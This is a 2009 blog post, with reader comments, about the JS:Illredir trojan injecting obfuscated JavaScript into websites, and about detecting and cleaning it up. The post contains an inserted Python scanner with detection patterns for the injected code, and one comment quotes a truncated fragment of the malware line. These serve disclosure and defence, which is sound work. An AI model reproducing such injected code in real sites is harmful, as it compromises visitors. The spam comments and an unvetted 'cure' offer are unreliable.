It’s 3.30am and way past my bedtime, but I feel this is extremely important and I must highlight this to everyone.
A few days ago, one of my website clients complained that the WordPress blog I had set up for them on their server could not be accessed. When I checked, it appeared to have a PHP header problem and I had no idea why it should occur, but I simply upgraded the WordPress installation and that seemed to solve it. Because he had that problem, I thought I had better check on all my other WordPress blogs on our own hosted servers; they all had the same problem.
I thought that WordPress was probably having a Christmas party and had caused all WordPress blogs to fail. I didn’t have time to check whether all other WordPress users had the same problem, but since it was solved easily enough by upgrading the installation, I left it at that.
Later though the same client told me that one of their staff who was updating some things on their website (the non-Wordpress main section) discovered a Trojan called JS:Illredir-B [Trj] when she accessed their website. A brief Google search using that name unearthed nothing. I found sites quoting similar issues though.
http://www.prelovac.com/vladimir/warning-website-virus-attack
http://forum.avast.com/index.php?topic=52476.0
About the Trojan
What’s so dangerous about Trojans? Basically, Trojans are harmful software which, while it seems to be doing what you asked it to do, is busy doing other things that you didn’t ask it to do… like, sending information (credit card information, personal information, financial information, etc) secretly to other people. Or they could rewrite certain codes or links in your browsers so that you are redirected to other websites without your knowledge. For example, you may be trying to visit your bank’s website, and you do key in the website URL manually, but you are rerouted to a phishing website which looks identical because of the code rewrite in your browser.
I’m not sure about what this Trojan really does – I’m not a virus expert. If anyone knows, or when I do find out, I’ll update.
Protect Yourself
I haven’t researched enough or spoken to enough people to find out which of their antiviruses work. It’s in the middle of the night so very few people are awake. All I can say here is, I’m using AVG and this antivirus did not detect the trojan. My client himself who uses Avira also said it was not detected. I’m not here to promote any particular antivirus actually, but my client’s staff (the one who detected it) used Avast Antivirus, so perhaps this may be a good one to use.
How Do We Tell Which Websites Are Under Attack?
Well, in my case, all the websites I was taking care of appeared to have been attacked. I’ve managed to fix them, but I’ll have to keep an eye on them to make sure that they aren’t attacked again.
I’d like to appeal to everyone out there to be aware of this and to help where you can. My guess is that it is possible that there are many websites out there that have been attacked, but the owners or webmasters are unaware of it. This is because the webpage does not look any different from what it usually does, and this is why it’s so dangerous! Please note that the website owners themselves may not be the perpetrators, and are victims. If you have found any website that has been subjected to the trojan attack, please help out by informing the website owner and/or webmaster right away so that action can be taken.
Here is how you can find out whether the website has been attacked:
- Website seems to be loading slower than usual.
- When the website is loading, check the status bar. If the status bar indicates that there is some traffic being routed to websites of unusual names that are not related to the current website in any way, it is very possible that the website has been attacked.
- The easiest way to find out is to take a look at the page source. Go all the way to the bottom. After </html>, if there is something similar to the following, it indicates that the website has been under attack. This code which appears to be gibberish may also appear anywhere INSIDE the website instead of after </html>.
How to view the page source:
- Internet Explorer: View menu > Source
- Firefox: View menu > Page Source
- Google Chrome: Right-click anywhere on the page > View page source
- Opera: View menu > Page Source
- Safari: Right-click anywhere on the page > View Source OR View menu > View source
Fixing The Websites
For those of you who own websites and would like to know how to remove the trojan, it’s easy – just remove the extra code. Not all files are affected, I’ve found that mostly the following files are affected:
- Files named index or have the word index in them. E.g. index.html, index.php, index.htm, index_main.htm
- Files named home or have the word home in them. E.g. home.html, homepage.htm
- Files named main or have the word main in them. E.g. main.html, main_page.htm
- Files named header or have the word header in them. E.g. header.php, header.inc, header_main.php
- Files named footer or have the word footer in them. E.g. footer.php, footer.inc, footer_main.php
- All javascript files with the .js extension. E.g. javascript.js, functions.js
All folders in your server will be affected, including the root folder, the subfolders, the subdomains, and the subfolders in the subdomains.
While some forums suggest that only Linux servers are affected, I’ve found some of my clients who use Windows servers are also affected.
I think that there are some scripts available for you to download and run on your server so that it will automatically scan for and remove the code from all affected files, but I didn’t look for them because some other users warned that the scripts themselves have the virus in them. Removing the code file by file is tedious, of course. What I did was to check the last modified date of the files – in my case, the files were affected on 24th and 25th December 2009. That way, I easily spotted which files had been modified, and I either removed the code manually or re-uploaded my local copy onto the server. It’s tedious, but I know it works.
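The two checks described above (look for a script tag appended after </html> or a hex-escaped one-line blob in .js files, and narrow the search to files last modified on the dates of the attack) can be automated as a read-only scanner. The script below is an added example, not code from the original post; the sample web root it builds and the hex-escaped string in it are constructed, and it only reports suspect files so that each one can be reviewed and restored from a clean local copy.

```python
import os
import re
import tempfile
from datetime import date
from pathlib import Path

# Two signs of the injection the post describes: a <script> block appended
# after the closing </html> tag, and a one-line blob of obfuscated JavaScript
# full of \xNN hex-escaped strings appended to .js, PHP or HTML files.
TRAILING_HTML_RE = re.compile(r"</html>\s*(\S.*)$", re.IGNORECASE | re.DOTALL)
HEX_ESCAPE_RUN_RE = re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}")

# The post says index/home/main/header/footer files and .js files are hit
# "mostly"; scanning every web text file avoids missing the rest.
WEB_SUFFIXES = (".html", ".htm", ".php", ".inc", ".js")


def find_injection(text):
    """Return (reason, snippet) when text looks tampered with, else None."""
    m = TRAILING_HTML_RE.search(text)
    if m and "<script" in m.group(1).lower():
        return ("script after </html>", m.group(1)[:60])
    m = HEX_ESCAPE_RUN_RE.search(text)
    if m:
        return ("obfuscated js blob", m.group(0)[:60])
    return None


def scan_tree(root, modified_on=None):
    """Walk root and report suspect files as (path, mtime, reason, snippet).

    modified_on: optional list of 'YYYY-MM-DD' strings; when given, only files
    last modified on those dates are examined (the check the post relied on).
    Nothing is deleted here: review each hit and restore a clean copy.
    """
    hits = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            p = Path(dirpath) / fn
            if p.suffix.lower() not in WEB_SUFFIXES:
                continue
            mtime = date.fromtimestamp(p.stat().st_mtime).isoformat()
            if modified_on and mtime not in modified_on:
                continue
            found = find_injection(p.read_text(errors="replace"))
            if found:
                hits.append((str(p), mtime) + found)
    return hits


# Constructed sample (not the real payload): a short hex-escaped string of the
# kind the injected code uses to hide the URL it loads.
BLOB = r'var Z="\x2f\x62\x72\x61\x6d\x6a\x6e\x65\x74";'


def demo(modified_on=None):
    """Build a throwaway sample web root, scan it and return the hits."""
    root = Path(tempfile.mkdtemp())
    (root / "js").mkdir()
    (root / "index.html").write_text("<html><body>ok</body></html>\n<script>" + BLOB + "</script>")
    (root / "js" / "functions.js").write_text("function f(){}\n" + BLOB)
    (root / "footer.php").write_text("<?php echo 'clean'; ?></html>\n")  # untouched file
    (root / "about.html").write_text("<html></html>\n<script>" + BLOB + "</script>")
    return scan_tree(root, modified_on)


if __name__ == "__main__":
    for path, mtime, reason, snippet in demo():
        print(f"{mtime} {path}: {reason}: {snippet}")
```

Run it against a copy of the web root (e.g. `scan_tree("/path/to/site", ["2009-12-24", "2009-12-25"])`) and compare each hit with your local copy before replacing it.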
If anyone has found anything to add to the above, please let me know by email or by commenting. This is pretty dangerous and it’s so malicious… so please be vigilant and do your bit to help out and spread the word.
One more thing I’d like to add: Don’t expect your web hosting provider to inform you or to work on the problem for you. The moment I discovered this, I wrote to all the web hosting providers that my different websites reside on to ask them to check how this could have happened, and also to ask them to inform their clients, and their responses were about the same. They asked me to choose a password that was difficult to guess, and one said I was the only account affected – and this from a company from which I bought several packages, ALL of which had been attacked.


133 comments
22 pings
depannage informatique says:
April 7, 2010 at 9:29 pm (UTC 8)
is there something we can use to fix it?
Mike says:
April 9, 2010 at 1:17 pm (UTC 8)
version 1.01 is out
Mike says:
April 9, 2010 at 1:25 pm (UTC 8)
If you want cure send me the samples in a zip/rar archive
fanta78 says:
April 13, 2010 at 2:17 am (UTC 8)
Hi Zyen and everyone,
I got almost the same issue on one of my WordPress blogs last weekend. A local anti-malware software (Trend Micro) found out this: Virus JS:Illredir-AQ [Trj] (Engine B).
Some major PHP files were infected, as well as most of the standard WordPress .js files, plus some plugin JS files too.
I got rid of this infection by reloading the original WordPress files over it, plus the infected plugins’ original files. The database was unaffected.
The malware was sending some requests to floridaorigin.at and was composed by a long javascript line added at the end of the infected files.
It looked like this :
var i='';var I="";var N_=new Date();var FH;if(FH!='uj' && FH!='Wf'){FH=''};....
I read in the comment that this malware could have used the ftp client on a pc to infect the wordpress install. Is this behavior confirmed ?
Thanks !
fanta78 says:
April 13, 2010 at 2:24 am (UTC 8)
I forgot to mention that the malware has added a new file in the /wp-admin/js folder, named users.js
I did not spot it in the first place because its name was similar to a standard Wp file. But a comparison with a blank WP installation shows this extra file.
Miguel says:
May 14, 2010 at 1:28 am (UTC 8)
Now there is another “flavour” of this f*cking trojan. AVAST detects it as “JS:Illredir-BL”.
In my case (a few DRUPAL websites) the sites were not loading (a PHP error was spat out) and therefore I noticed the presence of these weird JS lines at the end of my files.
It seems to use FTP client stored passwords (FileZilla’s in my case) to connect to every site and modify files.
It has been a pain in the ass to fix all the mess this shit has done.
The malware code is something like:
Hope this helps someone.
Yohanes Supriyato says:
May 17, 2010 at 12:57 pm (UTC 8)
nice…thank for information.
Marco says:
June 2, 2010 at 7:26 pm (UTC 8)
I have a server where some sites were infected. How can I secure the server so this doesn’t happen again?
Junk silver says:
June 3, 2010 at 4:18 pm (UTC 8)
Fine information, many thanks to the author. It is puzzling to me now, but in general, the usefulness and importance is overwhelming. Very much thanks again and best of luck!
Tess says:
June 13, 2010 at 7:13 am (UTC 8)
Hi,
Thank you all for the valuable information. I am not a techy person and I need help. My WP blog was just infected by a Trojan virus JS:Illredir-CB[Trj]. When I open my website, Avast gives a notice that looks like this:
Object: my website folder\javascript\date.js
Infection: JS:Illredir-CB[Trj]
Action: Connection aborted
Process: c:\Program Files\IE\iexplore.exe
Can anybody help me remove this virus? I have informed my hosting provider about this but they said the infection must be in my local hard drive. Thanks in advance.
Ami Mortinez says:
July 9, 2010 at 6:06 pm (UTC 8)
Which is what several persons would want to do– producing a big amount of money. it can be incredibly great that you’ve post this a single. at least there would be points that could aid folks on their way in seeking this for the answer of their desires. well anyway, your blog is fantastic. preserve it up.
muwko says:
July 21, 2010 at 9:26 pm (UTC 8)
it was very interesting to read.
I want to quote your post in my blog. Can I?
And do you have an account on Twitter?
Minnie Eichholz says:
September 5, 2010 at 7:02 pm (UTC 8)
I posted concerning earlier.
Website says:
September 18, 2010 at 8:56 am (UTC 8)
In IE9, Microsoft has integrated its SmartScreen Filter with the new Download Manager feature to bolster security.
Карго китай says:
September 23, 2010 at 2:46 am (UTC 8)
With this blog article you have help me to discover the facts which I have to get far more data. Thanks for that!
jayson says:
December 15, 2010 at 3:21 pm (UTC 8)
Hi Mike, please help me. I don’t know how I can fix this problem: whenever I access my WP blog – http://blog.gohunt.ph/wp-admin – it redirects to this URL – http://blog.gohunt.ph/wp-login.php?redirect_to=http://blog.gohunt.ph/wp-admin/&reauth=1
My client uses BLUEHOST and I don’t know if our programmer knows about these issues in relation to their hosting provider.
valium says:
January 25, 2011 at 11:54 pm (UTC 8)
The next time I read a weblog, I hope that it doesn’t disappoint me as much as this one. I mean, I know it was my option to read, but I actually thought you’d have something interesting to say. All I hear is a bunch of whining about something that you could repair if you weren’t too busy searching for attention.
new articles says:
February 28, 2011 at 1:35 am (UTC 8)
My accomplice and I really loved studying this weblog publish, I used to be just itching to know do you trade featured posts? I’m at all times trying to find somebody to make trades with and merely thought I might ask.
Free Skins says:
April 4, 2011 at 12:32 pm (UTC 8)
Hello, this is a fantastic post, and I can tell you that I will definitely follow your website from now on. Visit me at Free Minecraft1.4
Ned Autullo says:
April 5, 2011 at 12:08 am (UTC 8)
This is a great idea. Thanks for sharing those knowledge. I will definitely check it out.
Nike Dunks says:
April 8, 2011 at 12:09 pm (UTC 8)
Good blog, I tend to agree with nearly all of what you wrote. I would love to see new posts on this. I will bookmark and come back.
Marcy Knori says:
April 8, 2011 at 7:54 pm (UTC 8)
I just want to tell you that I’m all new to blogs and definitely loved your blog site. Very likely I’m going to bookmark your blog . You absolutely come with very good posts. Thanks for revealing your web page.
Download HD Trailer says:
May 18, 2011 at 10:46 pm (UTC 8)
Thanks for this! I’ll check this site everyday and looking for some posts like this.
gourmet foods online says:
June 12, 2011 at 11:40 pm (UTC 8)
This can be a good weblog. Maintain up all the work. I too enjoy to blog. This is great everyone sharing opinions
USMLE step 2 says:
July 3, 2011 at 6:54 pm (UTC 8)
When i definitely trust everything. Required a little bit to read simple things nonetheless it has been well worth the while. I have to be planning to read some other content on this website to see in the event there is anything how excellent like that
Medical Books says:
July 8, 2011 at 2:48 pm (UTC 8)
She Needs Pussy
Watch Boondocks says:
August 15, 2011 at 1:51 pm (UTC 8)
Awesome post indeed. Friend on mine has been awaiting for this update.
Lilly Wachowski says:
August 24, 2011 at 1:22 pm (UTC 8)
you’re really a excellent webmaster. The website loading speed is incredible. It seems that you’re doing any distinctive trick. Moreover, The contents are masterpiece. you have done a magnificent task in this topic!
Fred says:
September 26, 2011 at 2:06 am (UTC 8)
Thanks for this post.
soft skills training says:
November 11, 2011 at 8:13 am (UTC 8)
I enjoy reading a post that will make people think. Also, thanks for allowing me to comment!
forex says:
January 5, 2012 at 3:09 pm (UTC 8)
you are really a good webmaster. The web site loading velocity is amazing. It sort of feels that you are doing any unique trick. Furthermore, The contents are masterpiece. you have done a magnificent task in this matter!
Fotografia ślubna Rzeszów says:
January 5, 2012 at 3:15 pm (UTC 8)
Valuable information. Lucky me I found your web site by accident, and I am stunned why this twist of fate didn’t took place earlier! I bookmarked it.
Up2date says:
January 5, 2012 at 3:22 pm (UTC 8)
What I wouldn’t give to have a debate with you about this. You just say so many things that come from nowhere that I’m pretty sure I’d have a fair shot. Your blog is great visually, I mean people won’t be bored. But others who can see past the videos and the layout won’t be so impressed with your generic understanding of this topic.
Trojan Attack: JS:Illredir [Trj] | MFSec says:
January 30, 2010 at 7:19 am (UTC 8)
[...] Link to the post on ZyenWeb Tool: Remove JS:Illredir-B/C/D/E [...]
Cah Sleman Blog's » Blog Archive » Trojan Attack: JS: Illredir-B [Trj] says:
March 17, 2010 at 6:52 pm (UTC 8)
[...] Source: http://www.zyenweb.com/ [...]
WordPress: help, my blog is under attack! | Fantablog says:
April 13, 2010 at 4:32 pm (UTC 8)
[...] Zyen’s blog, which had exactly the same unpleasant experience, with many comments from other victims and some advice: http://www.zyenweb.com/2009/12/30/trojan-attack-jsillredir-b-trj/ [...]